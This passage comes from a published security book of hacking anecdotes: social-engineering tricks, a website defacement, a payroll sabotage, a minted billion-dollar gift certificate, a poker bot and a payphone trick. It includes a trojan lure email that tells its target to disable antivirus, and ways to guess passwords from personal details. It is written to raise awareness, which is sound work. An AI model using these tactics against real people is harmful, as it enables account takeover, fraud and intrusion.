           earnest sincerity.)
      ●    “Last night I was really good so why can’t I play a game
           now?” (A desperate attempt based on muddled reasoning.)
      ●    “I won’t do it ever again. (Pause.) Can I play a game now?”
           (“Won’t ever do it again” — how gullible does she think
           we are?)
      ●    “Can I have back it now, please?” (If promises don’t work,
           maybe a little begging will help . . . )
      ●    “I have to go back to school tomorrow, so I won’t be able to
           play my game unless I can get started now.” (Okay, how many
           different forms of social engineering are there? Maybe she
           should have been a contributor to this book.)
      ●    “I’m sorry and I was wrong. Can I just play for a little while?”
           (Confession may be good for the soul but may not work very
           well as manipulation.)
      ●    “Kevin made me do it.” (I thought only hackers said that!)
      ●    “I’m really sad without my game.” (If nothing else works, try
           looking for a little sympathy.)
      ●    “I’ve gone more than half the day without my game.” (In
           other words, “How much suffering is enough suffering?”)
244                         The Art of Intrusion


      ●    “It doesn’t cost any money to play.” (A desperate attempt to
           guess at what her mother’s reason could be for extending the
           punishment so long. Bad guess.)
      ●    “It’s my birthday weekend and I can’t play my games.”
           (Another pitiful grab for sympathy.)

And continuing as we prepared to head for the airport:

      ●    “I’ll be bored at the airport.” (In the forlorn hope that bore-
           dom would be considered a fearsome thing to be avoided at
           all costs. Maybe if Briannah got bored enough, she might try
           drawing pictures or reading a book.)
      ●    “It’s a three-hour flight and I’ll have nothing to do!” (Still
           some hope she might break down and open the book that had
           been brought along.)
      ●    “It’s too dark to read and it’s too dark to draw. If I play a
           game, I can see the screen.” (The forlorn attempt at logic.)
      ●    “Can I at least use the Internet?” (There must be some com-
           promise in your heart.)
      ●    “You’re the best mom in the world!” (She is also skilled at
           using compliments and flattery in a feeble attempt to get what
           she wants.)
      ●    “It’s not fair!!!” (The final, last-ditch effort.)

  If you want to increase your understanding of how social engineers
manipulate their targets and how they move people from a thinking state
into an emotional state . . . just listen to your kids.


THE BOTTOM LINE
In our first book together, Bill Simon and I labeled social engineering as
“information security’s weakest link.”
  Three years later, what do we find? We find company after company
deploying security technologies to protect their computing resources
against technical invasion by hackers or hired industrial spies, and main-
taining an effective physical security force to protect against unauthorized
trespass.
  But we also find that little attention is given to counter the threats
posed by social engineers. It is essential to educate and train employees
about the threat and how to protect themselves from being duped into
  Chapter 10      Social Engineers — How They Work and How to Stop Them                    245

assisting the intruders. The challenge to defend against human-based vul-
nerabilities is substantial. Protecting the organization from being victim-
ized by hackers using social engineering tactics has to be the
responsibility of each and every employee — every employee, even those
who don’t use computers in performance of their duties. Executives are
vulnerable, frontline people are vulnerable, switchboard operators, recep-
tionists, cleaning crew staff, garage attendants, and most especially, new
employees — all can be exploited by social engineers as another step
toward achieving their illicit goal.
  The human element has been proven to be information security’s
weakest link for ages. The million dollar question is: Are you going to be
the weak link that a social engineer is able to exploit in your company?


NOTES
1. The remark by psychologist Neidert can be found online at www1.chapman.edu/comm/
comm/faculty/thobbs/com401/socialinfluence/mindfl.html.
2. See Kevin D. Mitnick and William L. Simon, The Art of Deception (Wiley Publishing, Inc., 2002),
pp. 266–271.
          Chapter 11
                        Short Takes
I’m not a cryptanalyst, not a mathematician. I just know how people make
mistakes in applications and they make the same mistakes over and over
again.
                            — Former hacker turned security consultant




S
        ome of the stories we were given in the process of writing this
        book didn’t fit neatly into any of the preceding chapters but are
        too much fun to ignore. Not all of these are hacks. Some are just
mischievous, some are manipulative, some are worthwhile because they’re
enlightening or revealing about some aspect of human nature . . . and
some are just plain funny.
  We enjoyed them and thought you might, too.


THE MISSING PAYCHECK
Jim was a sergeant in the U.S. Army who worked in a computer group at
Fort Lewis, on Puget Sound in the state of Washington, under a tyrant
of a top sergeant who Jim describes as “just mad at the world,” the kind
of guy who “used his rank to make everyone of lesser rank miserable.”
Jim and his buddies in the group finally got fed up and decided they
needed to find some way of punishing the brute for making life so
unbearable.
  Their unit handled personnel record and payroll entries. To ensure
accuracy, each item was entered by two separate soldier-clerks, and the
results were compared before the data was posted to the person’s record.


                                    247
248                        The Art of Intrusion


   The revenge solution that the guys came up with was simple enough,
Jim says. Two workers made identical entries telling the computer that
the sergeant was dead.
   That, of course, stopped his paycheck.
   When payday came and the sergeant complained that he hadn’t
received his check, “Standard procedures called for pulling out the paper
file and having his paycheck created manually.” But that didn’t work,
either. “For some unknown reason,” Jim wrote, tongue firmly planted in
cheek, “his paper file could not be located anywhere. I have reason to
believe that the file spontaneously combusted.” It’s not hard to figure
out how Jim came to this conclusion.
   With the computer showing that the man was dead and no hard-copy
records on hand to show he had ever existed, the sergeant was out of
luck. No procedure existed for issuing a check to man who did not exist.
A request had to be generated to Army headquarters asking that copies
of the papers in the man’s record be copied and forwarded, and for guid-
ance on whether there was any authority for paying him in the meantime.
The requests were duly submitted, with little expectation they would
receive a quick response.
   There’s a happy end to the story. Jim reports that “his behavior was
quite different for the rest the days I knew him.”


COME      TO   HOLLYWOOD, YOU TEEN WIZARD
Back when the movie Jurassic Park 2 came out, a young hacker we’ll call
Yuki decided he wanted to “own” — that is, gain control of — the
MCA/Universal Studios box that hosted lost-world.com, the Web site
for the Jurassic Park movie and the studio’s TV shows.
  It was, he says, a “pretty trivial hack” because the site was so poorly
protected. He took advantage of that by a method he described in tech-
nical terms as “inserting a CGI that ran a bouncer [higher port not fire-
walled] so I can connect to higher port and connect back to localhost for
full access.”
  MCA was then in a brand-new building. Yuki did a little Internet
research, learned the name of the architectural firm, got to its Web site,
and found little difficulty breaking into its network. (This was long
enough ago that the obvious vulnerabilities have presumably been fixed
by now.)
  From inside the firewall it was short work to locate the AutoCAD
schematics of the MCA building. Yuki was delighted. Still, this was just a
                              Chapter 11    Short Takes               249

sidebar to his real effort. His friend had been busy designing “a cute new
logo” for the Jurassic Park Web pages, replacing the name Jurassic Park
and substituting the open-jawed tyrannosaurus with a little ducky. They
broke into the Web site, posted their logo (see Figure 11-1) in place of
the official one, and sat back to see what would happen.




Figure 11-1: The substitute for the Jurassic Park logo.


  The response wasn’t quite what they expected. The media thought the
logo was funny, but suspicious. CNet News.com carried a story1 with a
headline that asked whether it was a hack or a hoax, suspecting that
someone in the Universal organization might have pulled the stunt to
garner publicity for the movie.
  Yuki says that he got in touch with Universal shortly afterward, explain-
ing the hole that he and his friend had used to gain access to the site, and
also telling them about a back door they had installed. Unlike many
organizations that learn the identity of someone who has broken into their
Web site or network, the folks at Universal appreciated the information.
  More than that, Yuki says, they offered him a job — no doubt figuring
he would be useful in finding and plugging other vulnerabilities. Yuki was
thrilled by the offer.
  It didn’t work out, though. “When they found that I was only 16, they
tried to lowball me.” He turned down the opportunity.
  Two years later, CNet News.com presented a list of their 10 all-time
favorite hacks.2 Yuki was delighted to see his Jurassic Pond hack promi-
nently included.
250                         The Art of Intrusion


  But his hacking days are over, Yuki says. He has “been out of the scene
for five years now.” After turning down the MCA offer, he started a con-
sulting career that he’s been pursuing ever since.


HACKING        A   SOFT DRINK MACHINE
Some time back, Xerox and other companies experimented with machines
that would do the “E.T., phone home” bit. A copying machine, say,
would monitor its own status, and when toner was running low, or feed
rollers were beginning to wear out, or some other problem was detected,
a signal would be generated to a remote station or to corporate head-
quarters reporting the situation. A service person would then be dis-
patched, bringing any needed repair parts.
  According to our informant, David, one of the companies that tested
the waters on this was Coca-Cola. Experimental Coke vending machines,
David says, were hooked up to a Unix system and could be interrogated
remotely for a report on their operational status.
  Finding themselves bored one day, David and a couple of friends
decided to probe this system and see what they could uncover. They
found that, as they expected, the machine could be accessed over telnet.
“It was hooked up via a serial port and there was a process running that
grabbed its status and formatted it nicely.” They used the Finger program
and learned that “a log-in had occurred to that account — all that
remained for us was to find the password.”
  It took them only three attempts to guess the password, even though
some company programmer had intentionally chosen one that was highly
unlikely. Gaining access, they discovered that the source code for the pro-
gram was stored in the machine and “we couldn’t resist making a little
change!”
  They inserted code that would add a line at the end of the output mes-
sage, about one time in every five: “Help! Someone is kicking me!”
  “The biggest laugh, though,” David says, “was when we guessed the
password.” Care to take a stab at what the password was that the Coke
people were so sure no one would be able to guess?
  The password of the Coke vending machine, according to David, was
“pepsi”!


CRIPPLING          THE IRAQI      ARMY        IN   DESERT STORM
In the run-up stages for operation Desert Storm, U.S. Army Intelligence
went to work on the Iraqi Army’s communication systems, sending
                          Chapter 11   Short Takes                      251

helicopters loaded with radio-frequency sensing equipment to strategic
spots along “the safe side of the Iraqi border.” That’s the descriptive
phrase used by Mike, who was there.
  The helicopters were sent in groups of threes. Before the evolution of
the Global Positioning System (GPS) for pinpointing locations, the three
choppers provided cross-bearings that enabled the Intelligence people to
plot the locations of each Iraqi Army unit, along with the radio frequen-
cies they were using.
  Once the operation began, the United States was able to eavesdrop on
the Iraqi communications. Mike says, “US soldiers who spoke Farsi
began to listen in on the Iraqi commanders as they spoke to their ground
troop patrol leaders.” And not just listen. When a commander called for
all of his units to establish communications simultaneously, the units
would sign in: “This is Camel 1.” “This is Camel 3.” “This is Camel 5.”
One of the U.S. eavesdroppers would then pipe up over the radio in
Farsi, “This is Camel 1,” repeating the sign-in name.
  Confused, the Iraqi commander would tell Camel 1 that he already
signed in and shouldn’t do it twice. Camel 1 would innocently say he had
only signed in once. “There would be a flurry of discussion with allega-
tions and denials about who was saying what,” Mike recounts.
  The Army listeners continued the same pattern with different Iraqi com-
manders up and down the border. Then they decided to take their ploy to
the next level. Instead of repeating a sign-in name, a U.S. voice, in English,
would yell, “This is Bravo Force 5 — how y’all doing!” According to Mike,
“There would be an uproar!”
  These interruptions infuriated the commanders, who must have been
mortified at their field troops hearing this disruption by the infidel
invaders and at the same time appalled to discover that they could not
radio orders to their units without the American forces overhearing every
word. They began routinely shifting through a list of backup frequencies.
  The radio-frequency sensing equipment aboard the U.S. Army copters
was designed to defeat that strategy. The equipment simply scanned the
radio band and quickly located the frequency that the Iraqis had switched
to. The U.S. listeners were soon back on track. Meanwhile, with each
shift, Army Intelligence was able to add to their growing list of the fre-
quencies being used by the Iraqis. And they were continuing to assemble
and refine their “order of battle” of the Iraqi defense force — size, loca-
tion, and designation of the units, and even action plans.
  Finally the Iraqi commanders despaired and forfeited radio communi-
cation with their troops, turning instead to buried telephone lines. Again,
the United States was right behind them. The Iraqi Army was relying on
252                          The Art of Intrusion


old, basic serial telephone lines, and it was a simple matter to tap into any
of these lines with an encrypted transmitter, forwarding all the traffic to
Army Intelligence.
   The American Army’s Farsi speakers went back to work, this time using
the same methods they had used earlier for disrupting the radio commu-
nications. It’s funny to picture the expression on the face of some Iraqi
major or colonel or general as a jovial voice comes booming down the
line, “Hi, this is Bravo Force 5 again. How y’all doing!”
   And maybe he might add something like, “We missed you for a while
and it’s good to be back.”
   At this point, the Iraqi commanders had no modern communication
options left. They resorted to writing out their orders and sending the
paper messages via trucks to the officers in the field, who wrote out their
replies and sent the truck on its way back across the steaming, sandy
desert to headquarters. A single query and response could take hours for
the round-trip. Commands that required multiple units to act in coordi-
nation became nearly impossible because it was so difficult to get the
orders to each involved field unit in time for them to act together.
   Not exactly an effective way to defend against the fast-moving American
forces.
   As soon as the air war started, a group of U.S. pilots was assigned the
task of looking for the trucks that shuttled messages back and forth
between the known locations of the Iraqi field groups. The Air Force
started targeting these communication trucks and knocking them out of
action. Within a few days, Iraqi drivers were refusing to carry the mes-
sages among field leaders because they knew it was certain death.
   That spelled a near-complete breakdown in the ability of the Iraqi com-
mand-and-control system. Even when Iraqi Central Command was able
to get radio orders through to the field, the field commanders, Mike says,
“were terrified about these communications because they knew that the
messages were being listened to by the U.S. Army and would be used to
send attacks against their location” — especially since, by responding to
the orders, the field commander revealed that he was still alive, and could
expect his response had allowed the Americans to pinpoint his location.
In an effort to spare their own lives, some Iraqi field units disabled their
remaining communication devices so they would not have to hear incom-
ing communications.
   “In short order,” Mike remembers with obvious glee, “the Iraqi Army
collapsed into chaos and inactivity in many locations because no one was
able — or willing — to communicate.”
                          Chapter 11    Short Takes                         253


THE BILLION-DOLLAR GIFT CERTIFICATE
For the most part, the following is directly taken from our conversation
with this former hacker, who is now a well-established, respected security
consultant.

     It’s all there, dude, it’s all there. “Why do you rob banks, Mr.
     Horton?” “That’s where the money is.”
     I’ll tell you a funny story. Me and this guy Frank from the
     National Security Agency — I won’t even give his name, he now
     works for Microsoft. We had a [penetration test] engagement
     with a company that makes digital gift certificates. They’re out
     of business, I’m still not gonna mention them.
     So, what are we gonna hack? Are we gonna hack the crypto in the
     gift certificate? No, [the encryption] was like awesome, very well
     done. It’s cryptographically secured, it would be a waste of time to
     try. So what are we gonna attack?
     We look at how a merchant redeems a certificate. This is an
     insider attack because we’ve been allowed to have a merchant
     account. Well, we find a flaw in the redemption system, an appli-
     cation flaw that gave us arbitrary command execution on the
     box. It was foolish, childish, no special skills needed — you just
     gotta know what you’re looking for. I’m not a cryptanalyst, not a
     mathematician. I just know how people make mistakes in appli-
     cations and they make the same mistakes over and over again.
     On the same subnet with the redemption center, they have [a con-
     nection to] their mint — the machine that makes the gift certifi-
     cates. We broke into that machine using a trust relationship. As
     opposed to just getting a root prompt, we made a gift
     certificate — we minted a gift certificate with 32 high bits, and
     set the currency unit to U.S. dollars.
     I now have a gift certificate worth $1,900,000,000. And the cer-
     tificate was completely valid. Someone said we should have set it
     to English pounds, which would have been more bang for the buck.
     So, we went to the web site for the Gap and bought a pair of socks.
     Theoretically, we had a billion, nine hundred million coming in
     change from a pair of socks. It was awesome.
     I wanted to staple the socks to the pen test report.
254                            The Art of Intrusion


  But he wasn’t done. He didn’t like the way he thought the story must
have sounded to us, and he went on, hoping to correct the impression.

      Maybe I sound like a rock star to you, but all you see is the path I
      took and you go, “Oh, my God, look how clever he is. He did this to
      get on the box, and then on the box he violated a trust relationship,
      and then once there he got onto the mint and he fabricated a gift
      certificate.”
      Yeah, but do you know how hard that really was? It was like,
      “Well, try this, did that work?” No sale. “Try this, did that
      work?” No sale. Trial and error. It’s curiosity, perseverance and
      blind luck. And mix in a little bit of skill.
      I actually still have those socks.


THE TEXAS HOLD ’EM HACK
One of the things poker players feel pretty confident about when sitting
down at a table in a major casino — whether playing today’s most popu-
lar version, Texas Hold ’Em, or some other variation — is that, under the
watchful eyes of the dealer, the pit bosses, and the all-seeing video cam-
eras, they can count on their own skill and luck, and not worry much that
some of the other players might be cheating.
  These days, thanks to the Internet, it’s possible to sit down at a poker
table electronically — playing from the comfort of your own computer,
for money, against live players sitting at their computers in various parts
of the country and the world.
  And then along comes a hacker who recognizes a way to give himself
more than a little advantage, by using a homemade bot — a robot — in
this case, an electronic one. The hacker, Ron, says that this involved
“writing a bot that played ‘mathematically perfect’ poker online while
misleading the opponents into thinking they were playing against a real
human player.” Besides making money on everyday games, he entered his
bot in quite a number of tournaments with impressive success. “In one
four-hour ‘free-roll’ (no entry fee) tournament that started with three
hundred players, the bot finished in second place.”
  Things were going great guns until Ron made an error in judgment:
He decided to offer the bot for sale, with a price tag of $99 a year to each
buyer. People began to hear about the product and folks using the online
poker site he had targeted became concerned that they might be playing
against robotic players. “This caused such an uproar (and concern by
                          Chapter 11   Short Takes                          255

casino management that they would lose customers) that the site added
code to detect the use of my bot and said they would permanently ban
anyone caught using it.”
  Time for a change in strategy.

     After unsuccessfully attempting to make a business of the bot tech-
     nology itself, I decided to take the whole project underground. I
     modified the bot to play at one of the largest online poker sites,
     and extended the technology so it could play in “team mode,”
     where two or more bots at the same table share their hidden cards
     among themselves for unfair advantage.

 In his original email about this adventure, Ron implied that his bots
were still in use. Later, he wrote again asking us to say the following:

     After assessing the financial harm that would be caused to thou-
     sands of online poker players, Ron ultimately decided never to use
     his technology against others.

 Still, online gamblers, you need to decide for yourselves. If Ron could
do it, so can others. You might be better off hopping a plane to Las Vegas.


THE TEENAGE PEDOPHILE CHASER
My coauthor and I found this story compelling. Even though it may be
only partially true or, for all we know, entirely made up, we decided to
share it essentially the way it was submitted:

     It all started when I was about 15 years old. A friend of mine,
     Adam, showed me how to place free phone calls from the school
     payphone, which was located outside on the pavilion where we
     used to eat lunch. This was the first time I had done anything
     even remotely illegal. Adam fashioned a paperclip into a kind of
     free phone card, using the paperclip to puncture the earpiece of the
     handset. He would then dial the phone number he wanted to call,
     holding down the last digit of the number and at the same time
     touching the paper clip to the mouthpiece. What followed was a
     series of clicks and then ringing. I was awestruck. It was the first
     time in my life when I realized how powerful knowledge could be.
     I immediately began reading everything I could get my hands on.
     If it was shady information, I had to have it. I used the paperclip
     trick all through high school until my appetite for darker avenues
256                           The Art of Intrusion


      followed. Perhaps it was to see just how far this newfound avenue
      could go. That coupled with the thrill of doing something “bad” is
      enough to drive any young 15-year-old punk to the underground.
      What followed next was my realization that it took more than
      just knowledge to be a hacker. You had to have that social cun-
      ning in order to execute the trap.
      I learned of these programs called Trojans through an online
      friend who had me load one into my computer. He could do
      amazing things like see what I was typing, recording my video
      cam stream, and all kinds of other fun stuff. I was in heaven. I
      researched all I could about this Trojan and began packing it
      into popular executables. I would go into chat rooms and try to
      get somebody to download one, but trust was an issue. No one
      trusted me, and with good reason.
      I went into a random teen IRC chat room and that’s where I
      found him: a pedophile came in looking for pictures of young kids
      and teens. At first I thought it was a joke, but I decided to play
      along and see if I could make a victim out of this person.
      I began to chat privately with him posing as a young girl who had
      every intention of meeting him one day — but not the way he
      thought. This gentleman was sick to say the least. My 15-year-old
      instincts wanted to do the world justice. I wanted to burn this guy
      so bad he would think twice about fishing for kids again. I tried
      on many occasions to send him the Trojan, but he was smarter
      than me. He had anti-virus software installed that blocked my
      every attempt. The funny thing was he never suspected me of
      being malicious. He thought that perhaps my computer was
      infected and it was attaching itself to the pictures I attempted to
      send. I just played dumb.
      After a few days of chatting, he began to get pushier. He wanted
      dirty pictures of me and he told me he loved me and wanted to meet
      me. He was a first class scumbag and just the perfect target to burn
      without remorse if I could just get in. I had gathered enough infor-
      mation about him to gain access to a few of his email accounts. You
      know those secret questions they ask you? “What is your favorite
      color?” “What is your mother’s maiden name?” All I had to do was
      fish this information out of him and voila I was in.
      The stuff he was up to was highly illegal. Let’s just say lots of
      pornography with children of varying ages. I was sickened.
                          Chapter 11   Short Takes                          257

     Then it dawned on me. If he wouldn’t accept the Trojan from me
     maybe he would accept it from one of his porn buddies. I spoofed
     an email address and wrote a short message.

     Check out this hot vid. Disable your virus scanner
     before downloading because it screws up the quality.
     P.S. You owe me.

     I thought for sure he was going to catch on and I waited patiently
     all afternoon for him to check the email. I had given up. I wasn’t
     meant for this [social engineering] stuff.
     Then at about 11 p.m. that night it happened. I got the message
     triggered by my Trojan to tell me it had installed on his machine.
     I had done it!
     I gained access and immediately began copying evidence into a
     folder [I created on his computer]; I named it “jailbait.” I
     learned all kinds of information about this guy. His name,
     address, where he worked, and even what documents he was work-
     ing on at the time.
     I couldn’t just call the FBI or the local police [because I was
     afraid just knowing about the material on that man’s computer]
     would land me in jail, and I was scared. After some more poking
     and prodding I learned he was married and he had kids. This
     was horrible.
     I did the only thing I knew to do. I sent his wife an email with all
     the information she needed to access the jailbait file. I then cov-
     ered my tracks and unloaded the Trojan.
     That was my first taste of exploitation of not only code, but emo-
     tions to get something done. Once I had access, I realized it wasn’t
     all it was cut out to be. It required more than just knowledge, it
     required cunning, lying, manipulating and hard work. But it
     was worth every ounce of energy to burn that asshole. I felt like a
     king at 15. And I couldn’t tell a single soul.
     But I wish I would have never seen the things I did.


. . . AND YOU DON’T EVEN HAVE TO                        BE A     HACKER
It’s clear from many of the stories in this book that most hackers take
years developing their knowledge. So it always seems remarkable to me
258                         The Art of Intrusion


when I run across an exploit involving hacker-type thinking carried out
by someone with no background in hacking. This is one of those.
   At the time of this incident, John was college senior majoring in
Computer Science, and found an intern position at a local electric and
gas company so that on graduation he’d have not just a degree but
some experience. The company put him to work performing Lotus
Notes upgrades for the employees. Each time he called someone to set
up an appointment, he’d ask them for their Lotus Notes password so
he could perform the upgrade. People had no hesitation in providing
the information.
   Sometimes, though, he would find himself playing voicemail tag and
end up with a scheduled appointment but no opportunity to ask for the
password in advance. You know what’s coming, and he figured it out for
himself: “I found that 80 percent of the people had never changed their
password from when Notes had been installed on their system, so my first
try was ‘pass.’”
   If that failed, John would drift around the person’s cubicle and take a
little look-see for a Post-it note with all their passwords, generally stuck
right in plain view on the monitor, or else hidden (if that’s an appropri-
ate word) under the keyboard or in their top drawer.
   And, if that approach still left him empty-handed, he had one more
card to play. “My last line of attack was studying the personal items in
their cubicle. Anything that would give a clue to children’s names, pets,
hobbies, and the like.” Several guesses was most often all it took.
   One time, though, was harder than usual. “I still remember one
woman’s password was giving me a hard time until I noticed that every
picture had a motorcycle in it.” On a hunch, he tried “harley” . . . and
got in.
   Tickled by the success, he started keeping track. “I made a game of it
and got in more than 90 percent of the time, spending less than ten min-
utes on each one. Those that eluded me generally turned out to be sim-
ple information that I could have found with deeper research — most
often, children’s birthdays.”
   It turned out to be a profitable internship, one that “not only provided
me with some resumé fodder, but also taught me how our first line of
defensive against hackers is also our weakest: the users themselves and
their password choices.”
   And that seems like a powerful message to end with. If every computer
user were to improve his or her passwords tonight — and not leave new
                              Chapter 11     Short Takes                             259

passwords in some easy-to-find place — then tomorrow morning, we
would suddenly find ourselves living in a much more secure world.
  We hope that will be an action message for every reader of this book.


NOTES
1. CNet News.com, “Lost World, LAPD: Hacks or Hoaxes?,” by Janet Kornblum, May 30, 1997.
2. CNet News.com, “The Ten Most Subversive Hacks,” by Matt Lake, October 27, 1999.
INDEX


3COM device configuration, determining, 200–202           countermeasures, 88
9/11, aftermath of, 34–35                                 insight, 87–88
                                                          restitution, 82–83
Abagnale, Frank, 46                                       surveillance, 77–81
accountability, 62–63                                   Boeing hacks (ne0h), 27–28
administrator accounts, renaming, 192                   Boelling, Don
alerts, 188                                               arrests, 82–83
altercasting, 234                                         detection, 75–79
American Registry for Internet Numbers (ARIN),            intrusion goes public, 81
       100–101                                            punishing the hackers, 83–84
Anderson, Charles Matthew (Matt)                          surveillance, 79–81
  arrest for Boeing hack, 82–83                         books and publications
  background, 70                                          The Art of Deception, 88, 232, 233
  current activities, 87                                  Catch Me If You Can, 46
  dumpster diving, 70–71                                  The Eudaemonic Pie, 3
  hotel services, theft of, 72–73                         Takedown, 24
  phone phreaking, 70–71                                Brock
  prison time, 84–86                                      3COM device configuration, determining,
  punishment, 81, 82–84                                          200–202
  restitution, 82–84                                      accessing the company system, 211–215
  U.S. District Court hack, 71–72, 73–74                  background, 195–196
ARIN (American Registry for Internet Numbers),            barging the IIS server, 213
       100–101                                            countermeasures, 216–218
armored car intrusion. See security company intrusion     hackers’ background, 195–196
The Art of Deception, 88, 232, 233                        identifying a router, 198–199
attribution, 236                                          mapping the network, 197–198, 202–207
authentication, countermeasures, 217–218                  passwords, cracking, 200, 210, 214
authorized changes, detecting, 188                        ping sweeps, 202–203
                                                          port scanning, 199–201
backticked variable injection flaw, 167–168               remote control of a PC, 208–211
backups, 177–179, 191                                     researching the target, 196–197
badges, phony, 130–131, 137                               reverse DNS lookup, 197–198
ball grid array (BGA) design, 21                          success, 215
bank cards, 141                                           trapped in a DMZ, 202–207
bank hacks                                              Burns, Eric (Zyklon), 35–40, 43–44
  bank cards, 141
  credit cards, 141                                     casino hack
  Dixie bank, 143, 145–147                                aftermath, 18–20
  Estonian banks, 139–141                                 avoiding detection, 10–11
  Internet banking, 139–141                               countermeasures, 20
  password cracking, 142, 148                             damage costs, 18–20
  Swiss bank, 147–148                                     development phase, 4–6
barging the IIS server, 213                               firmware, 5–8
Berkeley Internet Name Domain (BIND),                     getting caught, 16–18
       vulnerabilities, 43                                insight, 20
BGA (ball grid array) design, 21                          playing the slots, 8–16
billion-dollar gift certificate, 253–254                  punishment, 18
BIND (Berkeley Internet Name Domain),                     random number generator
       vulnerabilities, 43                                   manipulating the slots, 10
blackout, during penetration testing, 121–122                reverse engineering, 12–13
Boeing, security seminary, 75–79                             rewriting, 6–8
Boeing hacks (Matt and Costa)                                true randomness, 20
  break-in detected, 76–77                                research phase, 2–4
  breaking password encryption, 76                        wearable computer, 13–16



                                                    261
262                                                 Index

Catch Me If You Can, 46                                          sensitive files, protecting, 191
cease-and-desist process, 125                                    system-management tasks, 187–188
Chameleon, 27                                                    third-party applications, 190
checksumming (hashing), 21                                    “dead” cubicles, 64
Chinese university hack, 25–27                                default firewall rules, 111
chip on-board packaging, 21                                   defense-in-depth model, 45, 149
circumventing processes, 65                                   DMZ (demilitarized zone), 45
Citrix Metaframe vulnerability, 144, 145                      e-mail snooping, 111–112
Coke vending machine password, 250                            excessive privileges, 66
cold readings, 222–223, 236                                   exiting personnel, 64
Comrade                                                       filtering unnecessary services, 218
  background, 23                                              firewalls, 186–187
  busted, 30–32                                               firmware access, 20
  current activities, 40–41                                   hardening, 218
  and Khalid Ibrahim, 25–27                                   information leakage, 110
  and ne0h, 22–25                                             insider abuse, 62–66
  SIPRNET hack, 28–29                                         misconfigured proxy servers, 112
cops and robbers                                              network access protection, 136
  Boeing hack                                                 network monitoring, 45–46
    break-in detected, 76–77                                  on-site visitor policies, 65
    breaking password encryption, 76                          Operation Eligible Receiver, 41–42
    countermeasures, 88                                       password management, 63, 217
    insight, 87–88                                            password security, 136, 150
    surveillance, 77–81                                       patch management, 44–45
  Boeing security seminary, 75–79                             penetration testing, 135–137
corporate firewalls, 186                                      phone number sniffing, 110
Costa (Katsaniotis, Costa)                                    physical access, 63–64
  arrest for Boeing hack, 82–83                               port restrictions, 113
  background, 69–70                                           reverse DNS lookup, 111–112
  current activities, 87                                      reviewing firewall rules, 136
  dumpster diving, 70–71                                      role-based accounts, 62–63
  hotel services, theft of, 72–73                             securing personal laptops, 217
  phone phreaking, 70–71, 84–86                               social engineering, 110, 238
  prison time, 84–86                                          software integrity audits, 66
  punishment, 81, 82–84                                       software inventory and auditing, 65–66
  restitution, 82–84                                          static passwords, 88
  U.S. District Court hack, 71–72, 73–74                      tailgating, 136
costs of hacking. See damage estimates                        target-rich environments, 63
countermeasures                                               TCP port 53, blocking access to, 111
  accountability, 62–63                                       temporary workarounds, 216
  authentication, 217–218                                     terrorist intrusions, 44–46
  bank hacks, 150                                             Texas prison hack, 62–66
  BGA (ball grid array) design, 21                            unauthorized hardware, 64–65
  casino hack, 20                                             using high ports, 216
  checksumming (hashing), 21                                  zero-day exploits, 45
  chip on-board packaging, 21                                 zone transfer, 111
  circumventing processes, 65                               crackers. See also hackers; two-year hack
  crackers                                                    countermeasures
    administrator accounts, renaming, 192                        administrator accounts, renaming, 192
    alerts, 188                                                  alerts, 188
    authorized changes, detecting, 188                           authorized changes, detecting, 188
    backups, protecting, 191                                     backups, protecting, 191
    credential storage, preventing, 192–193                      credential storage, preventing, 192–193
    defense in depth, 193                                        defense in depth, 193
    DNS guessing, preventing, 190                                DNS guessing, preventing, 190
    hardening Windows, 192–193                                   firewalls, 186–187
    incident response, 188                                       hardening Windows, 192–193
    installation files, removing, 192                            incident response, 188
    Microsoft SQL servers, protecting, 190–191                   installation files, removing, 192
    Microsoft VPN services, 192                                  Microsoft SQL servers, protecting, 190–191
    MS SQL injection attacks, protecting against,                Microsoft VPN services, 192
           191–192                                               MS SQL injection attacks, protecting against,
    network shares, protecting, 190                                     191–192
    password management, 189–190                                 network shares, protecting, 190
    permissions, 188–189                                         password management, 189–190
    port scanning, 187                                           permissions, 188–189
                                                      Index                                                    263

    port scanning, 187                                        DNS (Domain Name Servers)
    sensitive files, protecting, 191                            guessing, preventing, 190
    system-management tasks, 187–188                            reverse DNS lookup, 95–96
    third-party applications, 190                               reverse lookup
  couriers, 183                                                   countermeasures, 111–112
  motivation, 154                                                 Excite@Home hack, 95–96
crackers, individual                                              security company intrusion, 197–198
  Erik                                                          vulnerabilities, 43
    busted, 163–164                                           Domain Name Servers (DNS)
    close call, 160–161                                         guessing, preventing, 190
    downloading source code, 164–165                            reverse DNS lookup, 95–96
    dumping Registry information, 161                           reverse lookup
    examining Internet Explorer history, 162                      countermeasures, 111–112
    hacking target applications, 161–163                          Excite@Home hack, 95–96
    hacking the target, 159–160                                   security company intrusion, 197–198
    identifying the target, 158–159                             vulnerabilities, 43
    known plaintext attack, 165–166                           door sensors, outsmarting, 133–134
    password cracking, 157–159, 165–166                       downloading, source code, 164–165, 180–182
    port scans, 155–157                                       dumping Registry information, 161
    retrieving licensing keys, 161–162                        dumpster diving, 70–71, 118, 120–121
    tracing network packets, 162–163                          Dykes, Dustin
  Robert                                                        accessing internal documents, 129–130
    accessing the help desk, 171–173                            the attack, 127–128
    background, 166, 168–169                                    background, 124
    backticked variable injection flaw, 167–168                 cease-and-desist process, 125
    backup dangers, 177–179                                     countermeasures, 135–137
    discovering server names, 170–171                           establishing wireless access, 127–128
    downloading source code, 180–182                            ethics of social engineering, 135
    e-mail addresses, retrieving, 178                           ground rules, 125–126
    hacking video post production software, 169–177             hand warmer trick, 133–134
    Outlook.pst file, retrieving, 178                           l0phtCrack, 128–129
    passwords, cracking, 175, 178–179, 180                      logging keystrokes, 130–132
    passwords, observations on, 179–180                         outsmarting door sensors, 133–134
    porn spam, 167–168                                          password cracking, 128–129
    rainbow tables attack, 180                                  phony badges, 130–131, 137
    retrieving mailing lists, 167–168                           planning, 126–127
    setup.pl exploit, 167–168                                   red teaming, 126–127
    sharing with other crackers, 182–185                        REX (Request to Exit), 133
    SQL injection attack, 173–177                               shoulder surfing, 126–127
    uploading to protected directories, 172                     tailgating, 132–133
credential storage, preventing, 192–193                         test results, 134–135
credibility, 233
credit cards, 141                                             electronic attack on the U. S., vulnerabilities, 41–42
                                                              e-mail
damage estimates                                                addresses, retrieving, 178
  casino hack, 18–20                                            Outlook.pst file, retrieving, 178
  Lamo, Adrian, 105, 109–110                                    sniffing, 122
  Lexis/Nexis hack, 105                                         snooping, countermeasures, 111–112
  Microsoft hack, 100                                         encryption, breaking passwords, 128–129
  theft of hotel services, 73                                 Erik
Davis, Chad, 39–40                                              busted, 163–164
“dead”cubicles, 64                                              close call, 160–161
